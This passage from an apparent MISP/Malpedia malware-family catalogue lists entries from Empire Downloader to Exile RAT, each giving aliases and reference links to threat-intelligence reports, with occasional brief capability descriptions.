https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://www.youtube.com/watch?v=q8of74upT_g
https://team-cymru.com/blog/2021/01/27/taking-down-emotet/
https://hello.global.ntt/en-us/insights/blog/behind-the-scenes-of-the-emotet-infrastructure
https://www.proofpoint.com/us/blog/threat-insight/geofenced-amazon-japan-credential-phishing-volumes-rival-emotet
https://blog.vincss.net/2021/01/re019-from-a-to-x-analyzing-some-real-cases-which-used-recent-Emotet-samples.html
https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?blob=publicationFile&v=2[https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?blob=publicationFile&v=2]
https://www.jpcert.or.jp/english/at/2019/at190044.html
https://www.binarydefense.com/emotet-evolves-with-new-wi-fi-spreader/
https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers
https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much
https://twitter.com/raashidbhatt/status/1237853549200936960
https://www.us-cert.gov/ncas/alerts/TA18-201A
https://cdn.www.carbonblack.com/wp-content/uploads/2020/05/VMWCB-Report-Modern-Bank-Heists-2020.pdf
https://hello.global.ntt/en-us/insights/blog/shellbot-victim-overlap-with-emotet-network-infrastructure
https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html
https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html
https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html
https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf
https://therecord.media/over-780000-email-accounts-compromised-by-emotet-have-been-secured/
https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf
https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return
https://www.zdnet.com/article/meet-the-white-hat-group-fighting-emotet-the-worlds-most-dangerous-malware/
https://www.secureworks.com/research/threat-profiles/gold-crestwood
https://cert-agid.gov.it/news/malware/semplificare-lanalisi-di-emotet-con-python-e-iced-x86/
https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_workshop_malware-analysis_jp.pdf
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf
https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure
https://www.youtube.com/watch?v=5_-oR_135ss
https://www.digitalshadows.com/blog-and-research/emotet-disruption/
https://www.deepinstinct.com/2020/08/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before/
https://www.youtube.com/watch?v=_BLOmClsSpc
https://unit42.paloaltonetworks.com/c2-traffic/
https://int0xcc.svbtle.com/dissecting-emotet-s-network-communication-protocol
https://paste.cryptolaemus.com
https://blog.virustotal.com/2020/11/using-similarity-to-expand-context-and.html
https://www.politie.nl/nieuws/2021/februari/17/politie-bestrijdt-cybercrime-via-nederlandse-infrastructuur.html
https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko
https://www.picussecurity.com/blog/emotet-technical-analysis-part-1-reveal-the-evil-code
https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/
https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus
https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/
https://www.hornetsecurity.com/en/threat-research/emotet-botnet-takedown/
https://medium.com/@0xd0cf11e/analyzing-emotet-with-ghidra-part-1-4da71a5c8d69
https://www.lac.co.jp/lacwatch/people/20201106_002321.html
https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf
https://blog.talosintelligence.com/2020/11/emotet-2020.html
https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf
https://atr-blog.gigamon.com/2020/01/13/emotet-not-your-run-of-the-mill-malware/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf
https://www.hornetsecurity.com/en/security-information/emotet-is-back/
https://www.proofpoint.com/us/blog/threat-insight/emotet-makes-timely-adoption-political-and-elections-lures
https://www.tagesschau.de/investigativ/br-recherche/emotet-schadsoftware-103.html
https://news.sophos.com/en-us/2020/07/28/emotets-return-is-the-canary-in-the-coal-mine/?cmp=30728
https://www.cert.govt.nz/it-specialists/advisories/emotet-malware-being-spread-via-email/
https://exchange.xforce.ibmcloud.com/collection/18f373debc38779065a26f1958dc260b
https://unit42.paloaltonetworks.com/emotet-command-and-control/
https://www.hornetsecurity.com/en/security-information/awaiting-the-inevitable-return-of-emotet/
https://www.bka.de/DE/Presse/Listenseite_Pressemitteilungen/2021/Presse2021/210127_pmEmotet.html
https://medium.com/brim-securitys-knowledge-funnel/hunting-emotet-with-brim-and-zeek-1000c2f5c1ff
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://www.spamhaus.org/news/article/783/emotet-adds-a-further-layer-of-camouflage
https://www.bleepingcomputer.com/news/security/united-nations-targeted-with-emotet-malware-phishing-attack/
https://www.seqrite.com/blog/the-return-of-the-emotet-as-the-world-unlocks/
https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/
http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1
https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation
https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/
https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/
https://www.youtube.com/watch?v=8PHCZdpNKrw
https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes
https://www.cert.ssi.gouv.fr/alerte/CERTFR-2020-ALE-019/
https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf
https://www.hornetsecurity.com/en/security-information/emotet-update-increases-downloads/
https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/
https://github.com/mauronz/binja-emotet
https://www.cert.pl/en/news/single/whats-up-emotet/
https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf
https://persianov.net/emotet-malware-analysis-part-1
https://persianov.net/emotet-malware-analysis-part-2
https://mirshadx.wordpress.com/2020/11/22/analyzing-an-emotet-dropper-and-writing-a-python-script-to-statically-unpack-payload/
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/
https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/
https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf
https://marcoramilli.com/2019/10/14/is-emotet-gang-targeting-companies-with-external-soc/
https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor
https://blog.malwarebytes.com/trojans/2020/07/long-dreaded-emotet-has-returned/
https://www.blueliv.com/blog/research/where-is-emotet-latest-geolocation-data/
https://adalogics.com/blog/the-state-of-advanced-code-injections
http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/
https://hello.global.ntt/en-us/insights/blog/emotet-disruption-europol-counterattack
https://krebsonsecurity.com/2021/01/international-action-targets-emotet-crimeware
https://hatching.io/blog/powershell-analysis
https://quickheal.co.in/documents/technical-paper/Whitepaper_HowToPM.pdf
https://unit42.paloaltonetworks.com/attack-chain-overview-emotet-in-december-2020-and-january-2021/
https://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/
https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes
https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/
https://securelist.com/financial-cyberthreats-in-2020/101638/
https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/
https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled
https://blogs.jpcert.or.jp/en/2019/12/emotetfaq.html
https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/
https://www.youtube.com/watch?v=_mGMJFNJWSk
https://www.bleepingcomputer.com/news/security/emotet-malware-hits-lithuanias-national-public-health-center/
https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-two-596128
https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/
https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-droppers/
http://ropgadget.com/posts/defensive_pcres.html
https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/
https://research.checkpoint.com/emotet-tricky-trojan-git-clones/
https://blogs.jpcert.or.jp/en/2021/02/emotet-notice.html
https://cert.grnet.gr/en/blog/reverse-engineering-emotet/
https://www.bleepingcomputer.com/news/security/emotet-malware-now-steals-your-email-attachments-to-attack-contacts/
https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them
https://www.zscaler.com/blogs/research/emotet-back-action-after-short-break
https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89
https://intel471.com/blog/emotet-takedown-2021/
https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc
https://blog.trendmicro.com/trendlabs-security-intelligence/emotet-adds-new-evasion-technique-and-uses-connected-devices-as-proxy-cc-servers/
https://www.tgsoft.it/files/report/download.asp?id=7481257469
https://feodotracker.abuse.ch/?filter=version_e
https://www.deepinstinct.com/2020/10/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before-part-2/
https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/
https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf
https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html
https://unit42.paloaltonetworks.com/domain-parking/
https://www.eurojust.europa.eu/worlds-most-dangerous-malware-emotet-disrupted-through-global-action
https://spamauditor.org/2020/10/the-many-faces-of-emotet/
https://www.hornetsecurity.com/en/security-informationen-en/webshells-powering-emotet/
https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html
https://securelist.com/the-chronicles-of-emotet/99660/
https://cofense.com/flash-bulletin-emotet-epoch-1-changes-c2-communication/
https://twitter.com/milkr3am/status/1354459859912192002
https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection
https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/
https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf
https://github.com/d00rt/emotet_research
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://www.binarydefense.com/emocrash-exploiting-a-vulnerability-in-emotet-malware-for-defense/
https://portswigger.net/daily-swig/emotet-trojan-implicated-in-wolverine-solutions-ransomware-attack
https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/
https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf
https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates
https://isc.sans.edu/diary/rss/27036
https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service
https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html
https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/
https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html
https://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html
https://www.youtube.com/watch?v=EyDiIAtdI[https://www.youtube.com/watch?v=EyDiIAtdI]
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf
https://d00rt.github.io/emotet_network_protocol/
https://www.cert.pl/en/news/single/analysis-of-emotet-v4/
https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf
https://www.binarydefense.com/emotet-wi-fi-spreader-upgraded/
https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree
https://blog.malwarebytes.com/botnets/2019/09/emotet-is-back-botnet-springs-back-to-life-with-new-spam-campaign/
https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/
https://www.bleepingcomputer.com/news/security/microsoft-emotet-took-down-a-network-by-overheating-all-computers/
https://www.fortinet.com/blog/threat-research/deep-dive-into-emotet-malware.html
https://www.melani.admin.ch/melani/de/home/dokumentation/newsletter/Trojaner_Emotet_greift_Unternehmensnetzwerke_an.html
https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf
https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-one-592612
https://security-soup.net/quick-post-spooky-new-powershell-obfuscation-in-emotet-maldocs/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-003.pdf
https://blog.malwarebytes.com/threat-analysis/2021/01/cleaning-up-after-emotet-the-law-enforcement-file/
https://www.wiwo.de/my/technologie/digitale-welt/emotet-netzwerk-wie-eines-der-groessten-hacker-netzwerke-der-welt-lahmgelegt-wurde/27164048.html
https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/
https://www.digitalshadows.com/blog-and-research/how-cybercriminals-are-taking-advantage-of-covid-19-scams-fraud-misinformation/
https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html
https://medium.com/threat-intel/emotet-dangerous-malware-keeps-on-evolving-ac84aadbb8de

Empire Downloader

The tag is: misp-galaxy:malpedia="Empire Downloader"

Empire Downloader is also known as:

Table 1775. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.empire_downloader
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/
http://www.secureworks.com/research/threat-profiles/gold-burlap
https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/
https://us-cert.cisa.gov/ncas/alerts/aa20-275a
https://paper.seebug.org/1301/
http://www.secureworks.com/research/threat-profiles/gold-heron
https://www.secureworks.com/research/threat-profiles/bronze-firestone
https://twitter.com/thor_scanner/status/992036762515050496
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf
https://redcanary.com/blog/getsystem-offsec/
https://www.secureworks.com/research/threat-profiles/gold-drake
https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf
https://www.secureworks.com/research/threat-profiles/gold-ulrick
https://www.secureworks.com/research/threat-profiles/gold-heron
https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf
https://www.secureworks.com/research/threat-profiles/bronze-atlas

Emudbot

Supposedly a worm that was active around 2012-2013.

The tag is: misp-galaxy:malpedia="Emudbot"

Emudbot is also known as:

Table 1776. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.emudbot
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/worm_emudbot.jp

Enfal

The tag is: misp-galaxy:malpedia="Enfal"

Enfal is also known as:

Lurid

Table 1777. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal
https://www.secureworks.com/research/threat-profiles/bronze-palace
https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/
https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/
https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf
https://www.secureworks.com/research/threat-profiles/bronze-union
https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/

Enviserv

The tag is: misp-galaxy:malpedia="Enviserv"

Enviserv is also known as:

Table 1778. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.enviserv
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Enviserv.A

Epsilon Red

The tag is: misp-galaxy:malpedia="Epsilon Red"

Epsilon Red is also known as:

BlackCocaine

Table 1779. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.epsilon_red
https://therecord.media/epsilonred-ransomware-group-hits-one-of-indias-financial-software-powerhouses/
https://news.sophos.com/en-us/2021/05/28/epsilonred/
https://cybleinc.com/2021/06/03/nucleus-software-becomes-victim-of-the-blackcocaine-ransomware/

EquationDrug

The tag is: misp-galaxy:malpedia="EquationDrug"

EquationDrug is also known as:

Table 1780. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.equationdrug
https://securelist.com/inside-the-equationdrug-espionage-platform/69203/
https://mp.weixin.qq.com/s/3ZQhn32NB6p-LwndB2o2zQ
https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/
http://artemonsecurity.blogspot.com/2017/03/equationdrug-rootkit-analysis-mstcp32sys.html

Equationgroup (Sorting)

Rough collection EQGRP samples, to be sorted

The tag is: misp-galaxy:malpedia="Equationgroup (Sorting)"

Equationgroup (Sorting) is also known as:

Table 1781. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.equationgroup
https://laanwj.github.io/2016/08/28/feintcloud.html
https://laanwj.github.io/2016/09/17/seconddate-cnc.html
https://laanwj.github.io/2016/09/04/blatsting-command-and-control.html
https://laanwj.github.io/2016/08/22/blatsting.html
https://laanwj.github.io/2016/09/11/buzzdirection.html
https://laanwj.github.io/2016/09/23/seconddate-adventures.html
https://laanwj.github.io/2016/09/13/blatsting-rsa.html
https://laanwj.github.io/2016/09/01/tadaqueos.html
https://laanwj.github.io/2016/09/09/blatsting-lp-transcript.html

Erebus (Windows)

The tag is: misp-galaxy:malpedia="Erebus (Windows)"

Erebus (Windows) is also known as:

Table 1782. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.erebus
https://www.bleepingcomputer.com/news/security/erebus-ransomware-utilizes-a-uac-bypass-and-request-a-90-ransom-payment/

Eredel

Eredel Stealer is a low price malware that allows for extracting passwords, cookies, screen desktop from browsers and programs.

According to nulled[.]to:

Supported browsers Chromium Based: Chromium, Google Chrome, Kometa, Amigo, Torch, Orbitum, Opera, Opera Neon, Comodo Dragon, Nichrome (Rambler), Yandex Browser, Maxthon5, Sputnik, Epic Privacy Browser, Vivaldi, CocCoc and other Chromium Based browsers.

Stealing FileZilla
Stealing an account from Telegram
Stealing AutoFill
Theft of wallets: Bitcoin | Dash | Monero | Electrum | Ethereum | Litecoin
Stealing files from the desktop. Supports any formats, configurable via telegram-bot

The tag is: misp-galaxy:malpedia="Eredel"

Eredel is also known as:

Table 1783. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.eredel
https://webcache.googleusercontent.com/search?q=cache:3hU62-Lr2t8J:https://www.nulled.to/topic/486274-eredel-stealer-lite-private-having-control-via-the-web-panel-multifunctional-stealer/&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-ab[https://webcache.googleusercontent.com/search?q=cache:3hU62-Lr2t8J:https://www.nulled.to/topic/486274-eredel-stealer-lite-private-having-control-via-the-web-panel-multifunctional-stealer/&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-ab]

Erica Ransomware

The tag is: misp-galaxy:malpedia="Erica Ransomware"

Erica Ransomware is also known as:

Table 1784. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.erica_ransomware
https://www.dropbox.com/s/f4uulu2rhyj4leb/Girl.scr_malware_report.pdf?dl=0

Eris

Ransomware.

The tag is: misp-galaxy:malpedia="Eris"

Eris is also known as:

Table 1785. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.eris
https://lekstu.ga/posts/go-under-the-hood-eris/

EternalRocks

The tag is: misp-galaxy:malpedia="EternalRocks"

EternalRocks is also known as:

MicroBotMassiveNet

Table 1786. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.eternalrocks
https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/
https://github.com/stamparm/EternalRocks

EternalPetya

The tag is: misp-galaxy:malpedia="EternalPetya"

EternalPetya is also known as:

BadRabbit
Diskcoder.C
ExPetr
NonPetya
NotPetya
Nyetya
Petna
Pnyetya
nPetya

Table 1787. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya
https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf
http://blog.talosintelligence.com/2017/10/bad-rabbit.html
https://securelist.com/from-blackenergy-to-expetr/78937/
https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html
https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/
http://www.intezer.com/notpetya-returns-bad-rabbit/
https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik
https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/
https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/
https://threatpost.com/ukrainian-man-arrested-charged-in-notpetya-distribution/127391/
https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/
http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html
https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/
https://aguinet.github.io//blog/2020/08/29/miasm-bootloader.html
https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/
https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-to-assess-real-world-resilience/
https://securelist.com/big-threats-using-code-similarity-part-1/97239/
https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-yet-another-stolen-piece-package/
https://securelist.com/apt-trends-report-q2-2020/97937/
https://gvnshtn.com/maersk-me-notpetya/
https://www.cyberscoop.com/russian-hackers-notpetya-charges-gru/
https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games
http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html
https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/
https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf
https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/
https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/
https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/
https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf
https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b
https://www.secureworks.com/research/threat-profiles/iron-viking
https://securelist.com/schroedingers-petya/78870/
https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/
https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors
https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/
https://securelist.com/apt-trends-report-q2-2019/91897/
https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna
https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware
https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/
https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4
https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/
https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer
https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/
https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/
https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/
https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html
https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/
https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html
https://securelist.com/bad-rabbit-ransomware/82851/
https://www.riskiq.com/blog/labs/badrabbit/

EtumBot

The tag is: misp-galaxy:malpedia="EtumBot"

EtumBot is also known as:

HighTide

Table 1788. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot
https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html
https://www.secureworks.com/research/threat-profiles/bronze-globe
https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise

Evilbunny

The tag is: misp-galaxy:malpedia="Evilbunny"

Evilbunny is also known as:

Table 1789. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.evilbunny
https://web.archive.org/web/20150311013500/http://www.cyphort.com/evilbunny-malware-instrumented-lua/
https://web.archive.org/web/20150218192803/http://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/
https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope

EvilGrab

The tag is: misp-galaxy:malpedia="EvilGrab"

EvilGrab is also known as:

Vidgrab

Table 1790. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.evilgrab
https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn
https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf
https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf

EVILNUM (Windows)

The tag is: misp-galaxy:malpedia="EVILNUM (Windows)"

EVILNUM (Windows) is also known as:

Table 1791. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.evilnum
https://mp.weixin.qq.com/s/lryl3a65uIz1AwZcfuzp1A
https://github.com/eset/malware-ioc/tree/master/evilnum
https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/
https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/

EvilPony

Privately modded version of the Pony stealer.

The tag is: misp-galaxy:malpedia="EvilPony"

EvilPony is also known as:

CREstealer

Table 1792. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony
https://threatpost.com/docusign-phishing-campaign-includes-hancitor-downloader/125724/

Evrial

The tag is: misp-galaxy:malpedia="Evrial"

Evrial is also known as:

Table 1793. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.evrial
https://www.bleepingcomputer.com/news/security/evrial-trojan-switches-bitcoin-addresses-copied-to-windows-clipboard/

Exaramel (Windows)

The tag is: misp-galaxy:malpedia="Exaramel (Windows)"

Exaramel (Windows) is also known as:

Table 1794. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.exaramel
https://www.wired.com/story/sandworm-centreon-russia-hack/
https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/
https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf
https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf
https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf

Excalibur

The tag is: misp-galaxy:malpedia="Excalibur"

Excalibur is also known as:

Saber
Sabresac

Table 1795. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.excalibur
https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies

MS Exchange Tool

The tag is: misp-galaxy:malpedia="MS Exchange Tool"

MS Exchange Tool is also known as:

Table 1796. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.exchange_tool
https://github.com/nccgroup/Royal_APT
https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/

Exile RAT

